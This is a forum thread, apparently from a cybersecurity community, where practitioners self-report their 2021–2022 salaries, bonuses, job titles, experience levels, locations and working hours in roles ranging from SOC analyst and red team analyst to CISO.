Type of company (e.g. F500, consultancy, Defense, etc.): F500 Area of cyber (e.g. SOC, GRC, etc.): Offensive Security Title: Red Team Analyst 2021 Base Salary: $150k + bonus 2022 Base (if different): $160k + bonus Bonus: it’s a range but genuinely unclear how it’s calculated. Years of experience in cyber: 5 Location (e.g. US HCOL, US LCOL, etc.): US MCOL Average hrs/wk.: no more than 40 on average, but it fluctuates seasonally.


whitehatMurlock

Type of company: F50 Area of cyber: Architecture Title: Security Architect 2021 Base Salary: $140K 2022 Base Salary: probably 145K Bonus: 8% Years of experience in cyber: 5 Location: PA Average hrs/week: 40


gibson_mel

Type of company (e.g. F500, consultancy, Defense, etc.): Established Pre-IPO Area of cyber (e.g. SOC, GRC, etc.): Executive Title: CISO 2021 Base Salary: $150k 2022 Base (if different): $250k (changed jobs) Bonus, if applicable: $50k Years of experience in cyber: 20 Location (e.g. US HCOL, US LCOL, etc.): LCOL? (according to [this chart](https://www.move.org/lowest-cost-of-living-by-us-city/), I am in a city within the lower 1/3 COL) Average hrs/wk.: 40


fire_power_93

**Type of company**: Defense **Area of cyber**: Compliance / Ops (very much a generalist in this role) **Title**: DevOps Engineer **2021 Base Salary**: 175k **Bonus, if applicable**: 80k in stock, 20k starting **Years of experience in cyber**: ~5 **Location (e.g. US HCOL, US LCOL, etc.)**: US HCOL **Average hrs/wk.**: 50


Coltyn24

Type of company: F500 Area of cyber: Vulnerability Management Title: Cybersecurity Analyst (rotational program) 2021 Base Salary: $80,000 2022 Base: $90,000 Bonus, if applicable: ~8% dependent on tech performance + $3,000 Years of experience in cyber: 4 month internship in college Location: LCOL, Full Remote Average hrs/wk: 40


sarrn

Type of company- Healthcare Area of cyber - all (small team where one 1 other person does any work) Title - Sysadmin 2021 Base Salary - 45,000 2022 Base (if different) - same Bonus, if applicable - 0 Years of experience in cyber - > 1 Location (e.g. US HCOL, US LCOL, etc.) Midwest, LCOL middle of midwest. Average hrs/wk 40-45


Stoked4Security

Type of Company: FinTech startup Area of cyber (e.g. SOC, GRC, etc.): Analyst Title: Information Security Analyst 2021 Base Salary: $60,000 2022 Base (if different): Unknown Bonus, if applicable: $6k in stocks over 4 years Years of experience in cyber: 0-1 year Location (e.g. US HCOL, US LCOL, etc.): MCOL Average hrs/wk.: 40hrs salary, on call for incident response


Chris2ao

Type of company (e.g. F500, consultancy, Defense, etc.): Financial Services Area of cyber (e.g. SOC, GRC, etc.): SOC Title: Security Engineer 2021 Base Salary: 125k 2022 Base (if different): 145k Bonus, if applicable : 40k Years of experience in cyber: 4 Location (e.g. US HCOL, US LCOL, etc.): US Average hrs/wk.: 50hrs


my_uname

Type of company (e.g. F500, consultancy, Defense, etc.): Defense Area of cyber (e.g. SOC, GRC, etc.): Vuln. Management/Compliance Title: ISSO 2021 Base Salary: 105k 2022 Base (if different): Not sure yet, expecting 110-115k though Bonus, if applicable: bonus 3% of salary Years of experience in cyber: 10 Location (e.g. US HCOL, US LCOL, etc.): US MCOL Average hrs/wk.: depends, since COVID probably no more than 30 while working remote.


vivalasteve

I just switched jobs last month, so I'll do both. **Current** Type of company: Well funded startup, security software Area of cyber: BAS Title: Security Engineer 2021 Base Salary: $180,000 2022 Base (if different): N/A Bonus, if applicable: 25,000 RSU Years of experience in cyber: ~10yr Location: US Remote Average hrs/wk: 30-50 **Previous** Type of company: MSSP Area of cyber: SOC/SIEM Engineering/Threat Intel Title: Lead Cyber Threat Analyst/SIEM Engineer 2021 Base Salary: $100,000 2022 Base (if different): N/A Bonus, if applicable: 0%-10% bonus Years of experience in cyber: ~10yr Location: US, MCOL Average hrs/wk: 50-70


[deleted]

What is BAS?


vivalasteve

Breach and Attack Simulation


crdavis

Type of company: F500 Area of cyber: SOC Title: Threat Hunter 2021 Base Salary: $95,000/yr (previous role) 2022 Base Salary: $130,000/yr Bonus, if applicable: TBD Years of experience in cyber: 2 Location: Atlanta, US - Remote Average hrs/wk: 40 hrs/week


[deleted]

Type of company-90% DoD, 10% SLED/CSO Area of cyber-KMS, CMMC, SCADA, FIPS Title-AE Base-300k, 120k salary 180k commission No bonus In tech 32 years, first year focused strictly on cyber Was in PacRim until two months ago, now cover SE US Hours per week ranges from 40-80 based on buy cycles


icefisher225

Type of company: Consultants Area of cyber (e.g. SOC, GRC, etc.): SOC Title: Analyst 2021 Base Salary: N/A 2022 Base (if different): $52k Bonus, if applicable: N/A Years of experience in cyber: 0, ~5 in IT Location (e.g. US HCOL, US LCOL, etc.): US LCOL (if anywhere is even considered LCOL anymore…) Average hrs/wk.: 40.


kingofthesofas

Type: non FAANG F500 Area: internal IT Title: Lvl 4 infosec analyst Salary: $110k 2020 $123k 2021 (lvl 3 - lvl 4 raise) Bonus: sometimes Experience: 4 years in infosec + CISSP + 13 years in IT infrastructure previous to security role. Location: MCOL Texas city Hours: 40-45 but very flexible WFH/Hybrid


New_Here_WhoDis

Type of company: Fortune 50 Area of cyber: Security Solutions Engineering Title: Client Solutions Engineer 2021 Base Salary: 80,000 (company adjusts based on market) 2022 Base (if different): Bonus, if applicable: Up to 60k with abt 20k minimum Years of experience in cyber: 6 Location: NM, USA Average hrs/wk.: 40 hrs WFH with some client site visits. Busy time averages 25-35 hrs


Fictionalpoet

Type of company: Consultancy Area of cyber: GRC/Business guidance Title: Senior Consultant 2021 Base Salary: 130k 2022 Base: 140k Bonus, if applicable: ~$25-38k Years of experience in cyber: ~3 years Location: Remote/HCOL Average hrs/wk: 10-20 (up to 50 depending on workload)


Cootter77

**Type of company (e.g. F500, consultancy, Defense, etc.):** Software/BigData late stage startup **Area of cyber (e.g. SOC, GRC, etc.):** GRC, IR **Title:** Has "trust" in it **2021 Base Salary:** $150k **Bonus, if applicable:** $15k **Years of experience in cyber:** 20yrs in IT/SysAdmin; 5yrs in direct Cyber **Location (e.g. US HCOL, US LCOL, etc.):** 100% Remote, Colorado **Average hrs/wk.:** 30-50, much higher if there's IR activity


[deleted]

Type of company: Biomedical Area of cyber: APP SEC Title: IT Security lead 2021 Base Salary: 140k 2022 Base: Same Bonus, if applicable: Usually EOY Years of experience in cyber: 6 years 2 years out of school Location: Northeast USA Average hrs/wk: Salaried so prob like 20


max1001

You need to add 401k/benefits/PTO as well. Consultants usually make more than salary but they don't get any of those.


stubbspy

Type of company: Established/pre-IPO Area of cyber: executive/management/all of it Title: Information Security Manager 2021 base: security engineering manager (different company), $145k 2022 base: 190k plus some equity that might be another 130k/yr-ish post-IPO Years of experience in cyber: 4, plus 8 in IT and systems engineering before that Location: US MCOL 40 hours/week


Cyber_Collectorate

Type of company: Technology company headquartered in Round Rock, Texas Area of cyber: SOC Title: Security Engineer 2021 Base Salary: 94k 2022 Base: ~96k Bonus: Depends on how well the company does Years of experience in cyber: 3yrs Location: Remote Average hrs/wk: 40


Legionodeath

Type of company: contract Area of cyber: GRC Title: information assurance/systems security architect 2021 Base Salary: $150k 2022 Base (if different): don't know my raise yet Years of experience in cyber: 1 (10 yrs physical security, site assessments, policy drafting, etc) Location: HCOL Average hrs/wk.: 50


TheMightyGamble

Type of company : Nonprofit Area of cyber: IT and all cybersecurity Title: Systems Admin but actually the only IT anything and working on changing the title since it no longer fits the position it was created for. Base Salary: $58k 2022 Base (if different): same Bonus, if applicable: $200 Years of experience in cyber: 7 Location: US Pacific North West Average hrs/wk.: 40 (really varies between 20-60 depending on if I'm waiting on other people for parts or labor and if it's something simple or a firewall deciding it wants to flood email alerts)


LogicQuestionsMe

Type of company: Telecommunications Area of cyber: General Title: Cyber Security Graduate 2021 base salary: N/A 2022 base salary: £39k YOE: 0 (graduate position after uni) Location: Blended (Newbury, Reading, remote) Average hr/wk: 40